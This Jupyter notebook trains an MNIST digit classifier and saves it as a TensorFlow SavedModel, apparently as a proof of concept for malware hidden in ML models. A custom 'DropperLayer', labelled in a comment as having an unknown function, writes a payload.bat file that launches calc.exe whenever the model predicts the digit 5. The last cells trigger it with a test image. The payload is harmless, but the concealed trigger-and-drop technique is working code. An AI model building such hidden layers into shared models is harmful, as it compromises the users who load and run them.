In [1]:
import tensorflow as tf
from tensorflow.keras import layers, datasets
import numpy as np
import time

class DropperLayer(tf.Module):
    def __init__(self):
        super(DropperLayer, self).__init__()

    @tf.function
    def __call__(self, input):
        softmax_output = self.custom_softmax(input)  # 在输出层执行特定操作
        return softmax_output

    def custom_softmax(self, inputs):
        max_indices = tf.argmax(inputs, axis=1)
        for i in max_indices:
            if tf.equal(max_indices[0],5):
                tf.io.write_file('payload.bat', '''@echo off
                                 start calc.exe''')
        return max_indices

class MNISTClassifier(tf.keras.Model):
    def __init__(self):
        super(MNISTClassifier, self).__init__()
        # 卷积层，使用32个3x3的卷积核
        self.conv1 = layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1))
        # 池化层，使用2x2的最大池化
        self.pool1 = layers.MaxPooling2D((2, 2))
        # 展平层，将多维特征图展平成一维数组
        self.flatten = layers.Flatten()
        # 第一个全连接层，128个神经元
        self.dense1 = layers.Dense(128, activation='relu')
        # Dropout层，防止过拟合
        self.dropout = layers.Dropout(0.2)
        # 输出层，10个神经元，softmax激活函数
        self.out = layers.Dense(10, activation='softmax')
        # 自定义Dropper层，具体功能未知
        self.dropper_layer = DropperLayer()
    
    def call(self, x):
        # 卷积层后直接跟ReLU激活函数已经在Conv2D中实现
        x = self.conv1(x)
        # 池化层
        x = self.pool1(x)
        # 展平层
        x = self.flatten(x)
        # 第一个全连接层
        x = self.dense1(x)
        # Dropout层
        x = self.dropout(x)
        # 输出层
        x = self.out(x)
        # 自定义Dropper层
        output = self.dropper_layer(x)
        
        return x


# 加载MNIST数据集
(train_images, train_labels), (test_images, test_labels) = datasets.mnist.load_data()
train_images, test_images = train_images / 255.0, test_images / 255.0  # 归一化
train_images = tf.expand_dims(train_images, axis=-1)  # 增加通道维度
test_images = tf.expand_dims(test_images, axis=-1)

# 创建模型实例
model = MNISTClassifier()

model.compile(optimizer='adam',
              loss='sparse_categorical_crossentropy',
              metrics=['accuracy'])
              
# Record start time for training
training_start_time = time.time()

# 训练模型
model.fit(train_images, train_labels, epochs=5, batch_size=32)

# Record end time for training
training_end_time = time.time()

# Calculate training time
training_time = training_end_time - training_start_time
print(f"Training time: {training_time} seconds")


# Record start time for evaluation
evaluation_start_time = time.time()

# 评估模型
test_loss, test_acc = model.evaluate(test_images, test_labels)


# Record end time for evaluation
evaluation_end_time = time.time()

# Calculate evaluation time
evaluation_time = evaluation_end_time - evaluation_start_time
print(f"Evaluation time: {evaluation_time} seconds")
print("Test accuracy:", test_acc)

saved_model_path = "eagerTunnelcnn"
tf.saved_model.save(model, saved_model_path) 

Epoch 1/5
1875/1875 [==============================] - 67s 34ms/step - loss: 0.1883 - accuracy: 0.9440
Epoch 2/5
1875/1875 [==============================] - 63s 34ms/step - loss: 0.0696 - accuracy: 0.9782
Epoch 3/5
1875/1875 [==============================] - 62s 33ms/step - loss: 0.0517 - accuracy: 0.9838
Epoch 4/5
1875/1875 [==============================] - 60s 32ms/step - loss: 0.0370 - accuracy: 0.9883
Epoch 5/5
1875/1875 [==============================] - 57s 31ms/step - loss: 0.0303 - accuracy: 0.9902
Training time: 309.30604672431946 seconds
313/313 [==============================] - 5s 14ms/step - loss: 0.0378 - accuracy: 0.9871
Evaluation time: 4.9958295822143555 seconds
Test accuracy: 0.9871000051498413


INFO:tensorflow:Assets written to: eagerTunnelcnn\assets


INFO:tensorflow:Assets written to: eagerTunnelcnn\assets


In [ ]:
model.summary()

In [ ]:
import random
import matplotlib.pyplot as plt
# 找到标签为5的图片的索引
indices_label_5 = np.where(test_labels == 5)[0]
# 从中随机选择一个索引
index = random.choice(indices_label_5)
test_image = test_images[index]

# 将 TensorFlow 张量转换为 NumPy 数组，并去除单维度
test_image_np = test_image.numpy().squeeze()

# 显示图像
plt.imshow(test_image_np, cmap='gray')  # 使用灰度色彩映射显示图像
plt.axis('off')  # 隐藏坐标轴
plt.title('Test Image with Label 5')
plt.show()


In [ ]:
test_image = test_image_np.reshape(1, 28, 28, 1)  # 添加批量维度

# 转换为 TensorFlow 张量
test_image_tensor = tf.convert_to_tensor(test_image, dtype=tf.float32)

# 进行推理预测
output = model(test_image_tensor)
predicted_class = np.argmax(output)
print("Predicted class:", predicted_class)